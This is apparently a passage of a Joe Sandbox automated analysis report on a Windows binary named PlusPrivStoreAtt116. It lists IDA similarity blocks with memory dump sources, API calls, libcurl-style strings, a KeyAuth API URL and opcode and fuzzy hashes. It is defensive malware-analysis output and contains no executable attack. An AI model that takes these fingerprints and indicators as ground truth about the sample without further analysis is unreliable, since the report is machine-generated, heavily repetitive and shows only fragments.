                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: _strdupfree
                                        • String ID: FALSE$TRUE
                                        • API String ID: 1865132094-1412513891
                                        • Opcode ID: bf6eb78e637c81cfb17562e742971b14b543e94c4e502e08d1207421d1d34735
                                        • Instruction ID: 532f9ab437a51c2b05da54396c79361df6479f7de92b6dbdcec4f3e27a7268f2
                                        • Opcode Fuzzy Hash: bf6eb78e637c81cfb17562e742971b14b543e94c4e502e08d1207421d1d34735
                                        • Instruction Fuzzy Hash: F541C362B4935684FFD58A67902437A2FA1AF057ACF644532EF5DC63C6DEAEE0418200
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: _time64$ErrorLast
                                        • String ID: TFTP response timeout
                                        • API String ID: 3339832089-3820788777
                                        • Opcode ID: 359a5eef5d2c32413f0da7aac13b68257feb1cf5314e86412ec95e4616813690
                                        • Instruction ID: 330d567c9458d6a5d6f7b40003adb0f50a051c948df4fb65c26f217168d725b3
                                        • Opcode Fuzzy Hash: 359a5eef5d2c32413f0da7aac13b68257feb1cf5314e86412ec95e4616813690
                                        • Instruction Fuzzy Hash: 5C418336608A4285EB619F26D4542B96B50FF89BA8F204232DE6DC77CAEFBCD4058740
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: fwrite
                                        • String ID: ...$...
                                        • API String ID: 3559309478-2253869979
                                        • Opcode ID: 302b132ee88cad9bd6f6907226ec01a6f59867d5edaea7f1bdfe6eb2bdd96f98
                                        • Instruction ID: 09857895ca3e824b57d5eafb3ec5b385f54f4fd7fffcf70283f674cc5ffd5824
                                        • Opcode Fuzzy Hash: 302b132ee88cad9bd6f6907226ec01a6f59867d5edaea7f1bdfe6eb2bdd96f98
                                        • Instruction Fuzzy Hash: F631C022A1CA8181EB60CB12E4443B96BA1FF84B88FB08131CA5D837D5CF7DE155C780
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: free$_strdup
                                        • String ID: :
                                        • API String ID: 2653869212-336475711
                                        • Opcode ID: 7dcec4a726ea8073a370bbb44f4725043a0a7e1bd9836d11447dfc771c4226d4
                                        • Instruction ID: 1a2872d8a73c4f1bef17ec0055d7db5319b5d4944c87b162705636732ff09b17
                                        • Opcode Fuzzy Hash: 7dcec4a726ea8073a370bbb44f4725043a0a7e1bd9836d11447dfc771c4226d4
                                        • Instruction Fuzzy Hash: 33219222709B8685EB628F15E6503A97BA0FF44B98FA44131CF9D83796EF7CD450C750
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: %s%s$LIST "%s" *
                                        • API String ID: 0-1744359683
                                        • Opcode ID: 85719f75dcdb96e6197976c791e40f2de33a90732eb886bb89f893e41dc579a2
                                        • Instruction ID: bb48e276d748dc2b1c5fcb93d0d22ca10c727c019eb11ca72c7ece3287f10f36
                                        • Opcode Fuzzy Hash: 85719f75dcdb96e6197976c791e40f2de33a90732eb886bb89f893e41dc579a2
                                        • Instruction Fuzzy Hash: 6D117F31F0874281EB15DB56E4801B96B60FF48BC8F684432DE4D9B756DFACE541D340
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: strchr$mallocmemcpy
                                        • String ID:
                                        • API String ID: 320687583-0
                                        • Opcode ID: e2d21262de4b7909a237c534343391991a6930e2b65d8f6e0f77b0b64d484383
                                        • Instruction ID: 9781c57a9fde9ffbd13a7f6b7d5ee54554e42f45068fa15ad308666afc9a5060
                                        • Opcode Fuzzy Hash: e2d21262de4b7909a237c534343391991a6930e2b65d8f6e0f77b0b64d484383
                                        • Instruction Fuzzy Hash: D421D411A0D69201FFA58B1392602B9ABD1DF45BCCF6C8171EE8D8B7C7EE6CE4469310
                                        APIs
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FF6029F1635), ref: 00007FF6029F4BC6
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FF6029F1635), ref: 00007FF6029F4BE7
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FF6029F1635), ref: 00007FF6029F4C02
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FF6029F1635), ref: 00007FF6029F4C10
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FF6029F1635), ref: 00007FF6029F4C22
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: free
                                        • String ID:
                                        • API String ID: 1294909896-0
                                        • Opcode ID: 2ccec22f818d614e78705a5ec82c81555469975f6029534154239fcb0ccdc8c7
                                        • Instruction ID: 621d457d7622d37d2db35ae1cee281bcfdd95289d041cf71e649e4e0f30b032a
                                        • Opcode Fuzzy Hash: 2ccec22f818d614e78705a5ec82c81555469975f6029534154239fcb0ccdc8c7
                                        • Instruction Fuzzy Hash: 2911C536A04B4682EB54DF26E9A022E77B4FF84F99B244435CE5E87725CF78D891C340
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: free
                                        • String ID: GMT$%.4s-%.2s-%.2s %.2s:%.2s:%c%c%s%.*s%s%.*s$TRUE
                                        • API String ID: 1294909896-910067264
                                        • Opcode ID: 3a97b54dd8c20e641dcfa4d9801de4b2c1f4c98a54d6da2505f9c7397ccb92bd
                                        • Instruction ID: 595828cd94c54b236f7b9f63ed2d44fa89af206c258ac4294c71ee78d7bb920a
                                        • Opcode Fuzzy Hash: 3a97b54dd8c20e641dcfa4d9801de4b2c1f4c98a54d6da2505f9c7397ccb92bd
                                        • Instruction Fuzzy Hash: F451E362E4C69648EBE18B26A54427E7FA5EF0179CF644032EA4DD6B96DFBCE441C300
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: free
                                        • String ID: %s: %s$ GMT$%.4s-%.2s-%.2s %.2s:%.2s:%c%c%s%.*s%s%.*s
                                        • API String ID: 1294909896-2632828617
                                        • Opcode ID: 837cbaf7fcdd32052fcb9ee980a98d0f492b635fa62e58f140a762f412d0c416
                                        • Instruction ID: 980f1c033e71c81cecca9ccc6ca183dfe6c168c2f622451787036998ac049589
                                        • Opcode Fuzzy Hash: 837cbaf7fcdd32052fcb9ee980a98d0f492b635fa62e58f140a762f412d0c416
                                        • Instruction Fuzzy Hash: E241B461A4C79285FBE48B16A5443BABF94FF41B98F644031DA8D83B56CFBCE546C700
                                        APIs
                                        • memset.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6029AD1A8), ref: 00007FF6029AD66E
                                        • memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6029AD1A8), ref: 00007FF6029AD69C
                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6029AD1A8), ref: 00007FF6029AD705
                                          • Part of subcall function 00007FF6029FFB18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,-3333333333333333,00007FF6029A43FE,7FFFFFFFFFFFFFFF,https://keyauth.win/api/1.2/,-3333333333333333,00007FF6029A1B59), ref: 00007FF6029FFB32
                                        • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6029AD712
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturnmallocmemcpymemset
                                        • String ID:
                                        • API String ID: 2942768764-0
                                        • Opcode ID: be577898cfb132f12a0948304b2fb9bc36eb211b7926233c65c7c8ef3fe3742e
                                        • Instruction ID: 7129b88a978442facbaf0b61ef0d9a3fa6022c5c82cfccfd7a60fc083adfc5b0
                                        • Opcode Fuzzy Hash: be577898cfb132f12a0948304b2fb9bc36eb211b7926233c65c7c8ef3fe3742e
                                        • Instruction Fuzzy Hash: C1419062B05B8585EF148F2AD04427D6B50FF44BA8F648635DA6D87BC6DFACE091C390
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: memcpy$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                        • String ID:
                                        • API String ID: 1775671525-0
                                        • Opcode ID: b289941bc787ad963bcb9495ad2c5e3cafef7c1359faf9c99362ff32d762317a
                                        • Instruction ID: 943c8e87e58dfdf9ff61e6cfe3cc1098fa5c3f935b82379580767032a5af6c36
                                        • Opcode Fuzzy Hash: b289941bc787ad963bcb9495ad2c5e3cafef7c1359faf9c99362ff32d762317a
                                        • Instruction Fuzzy Hash: A731E521B09B4181EA61DB13A54426B6A90FF04BE8F244635DFAE87BD6DE7CD181C380
                                        APIs
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,00007FF6029DD2EB), ref: 00007FF6029FB19E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: free
                                        • String ID: %s
                                        • API String ID: 1294909896-3043279178
                                        • Opcode ID: 073ba612a2cbe85256b1cde721385677e7217a76d979108c03dc8feec761c9f4
                                        • Instruction ID: a27a7b3717c58c64efc12b317b647bb96300021bfa3ed4aa7e697fb8d50a5821
                                        • Opcode Fuzzy Hash: 073ba612a2cbe85256b1cde721385677e7217a76d979108c03dc8feec761c9f4
                                        • Instruction Fuzzy Hash: 78415432618B4582E790CF16F4501AE77A4FB94BA8F240535EF9E43B62DF78E491C300
                                        APIs
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,00000000,?,00007FF6029DEB30,?,?,?,?,?,?,ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789-_,?), ref: 00007FF6029FB5D3
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF6029FB65C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: free
                                        • String ID: %s
                                        • API String ID: 1294909896-3043279178
                                        • Opcode ID: ff90f14b9c377f659e10b31d5fbc85e538c30466ebb5cf373757226f49f20229
                                        • Instruction ID: e77cf594b63629959e7f258c0e50cccb23833e651c3e8d034a76933f86af10db
                                        • Opcode Fuzzy Hash: ff90f14b9c377f659e10b31d5fbc85e538c30466ebb5cf373757226f49f20229
                                        • Instruction Fuzzy Hash: DF415232A08B4582E651DF26F5501AAB7A4FF49BA8F244535DF8E47BA6DF7CE091C300
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: memcpy$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                        • String ID:
                                        • API String ID: 1775671525-0
                                        • Opcode ID: ff507d46c410e9d9cdcf4b9eb39d48e974748f0d30041aa2655652cf5154f83c
                                        • Instruction ID: f9249c5ff2dc8a646c24e1ef1c3340fabc551c25bec191edb704a92bc737bfd8
                                        • Opcode Fuzzy Hash: ff507d46c410e9d9cdcf4b9eb39d48e974748f0d30041aa2655652cf5154f83c
                                        • Instruction Fuzzy Hash: CA311322B0978194EE119B13A6443AE6B91EF05BD8F684639DE5D47BC7DEBCE091C300
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: free
                                        • String ID: %u%.2s-%.2s-%.2s %.2s:%.2s:%.2s %.*s$GMT$TRUE
                                        • API String ID: 1294909896-918878739
                                        • Opcode ID: 5c811be7c639e6a817eeb1eaaef6f6908bb5a2a36ecbc2e96e5375d9d862ee5c
                                        • Instruction ID: 9414fad7927578bd3af2bc2c2393e56d1613e177922c286281e9131dcc9a9dcc
                                        • Opcode Fuzzy Hash: 5c811be7c639e6a817eeb1eaaef6f6908bb5a2a36ecbc2e96e5375d9d862ee5c
                                        • Instruction Fuzzy Hash: F931E222A48A8588EB91CF22D5402AA7B62FF44B98F644432EE4D83786CFBCE141C300
                                        APIs
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF6029E6B14
                                          • Part of subcall function 00007FF6029C6400: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF6029C6525
                                          • Part of subcall function 00007FF6029C6400: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF6029C6540
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: fwrite$free
                                        • String ID: %s%s$Wildcard - "%s" skipped by user$Wildcard - START of "%s"
                                        • API String ID: 3468156532-1133524294
                                        • Opcode ID: 731cc7035f99099314a47e223117183d5a1dbc052a3fec2f25bb9171d1e13b7d
                                        • Instruction ID: d72af5a8ae1968752d2cbeac57a73d5219d6b59ffeaa8d634f891f898083e3b9
                                        • Opcode Fuzzy Hash: 731cc7035f99099314a47e223117183d5a1dbc052a3fec2f25bb9171d1e13b7d
                                        • Instruction Fuzzy Hash: 8D413176A08A42C5EB10DF16D4441AD3B64FF54B89F654436DF4E8B396EEB9E441C300
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: free
                                        • String ID: %s: %s$%u%.2s-%.2s-%.2s %.2s:%.2s:%.2s %.*s$GMT
                                        • API String ID: 1294909896-1153420294
                                        • Opcode ID: 979e85848d636c6c0b0c76a7e7eb724a988065f1e42c35c4c663c2ae8dca01c9
                                        • Instruction ID: 91bce7ceac75c22b9eac96a97c6048a2f5a17d9d0b6024c4a315dba1f6406c46
                                        • Opcode Fuzzy Hash: 979e85848d636c6c0b0c76a7e7eb724a988065f1e42c35c4c663c2ae8dca01c9
                                        • Instruction Fuzzy Hash: 4731B421A4CB8289FBE08F52E4407AA7B90FF45B88FB44431DA4D97646DFBCE645C300
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: freemallocmemcpy
                                        • String ID: TRUE
                                        • API String ID: 3056473165-3412697401
                                        • Opcode ID: 336f45e28875de01f45820a47226f16eb8b9e84abcdede310df3c5d974aec670
                                        • Instruction ID: 047f84463708061eee1b1b1e035ea5761df3ceb4e0ec2ddf1173bd5f54e723d1
                                        • Opcode Fuzzy Hash: 336f45e28875de01f45820a47226f16eb8b9e84abcdede310df3c5d974aec670
                                        • Instruction Fuzzy Hash: DD219D66F4964644FF868A1796243762BA2AF44BF8F244532EE1D877C6DEBDE081C300
                                        APIs
                                        • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF6029C0BA2
                                        • memcpy.VCRUNTIME140 ref: 00007FF6029C0BDD
                                          • Part of subcall function 00007FF6029B5F30: malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF6029B5F45
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF6029C0C12
                                          • Part of subcall function 00007FF6029B6040: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FF6029C0640,?,?,?,?,?,?,?,?,?,?,00000000,00007FF6029B2471), ref: 00007FF6029B6067
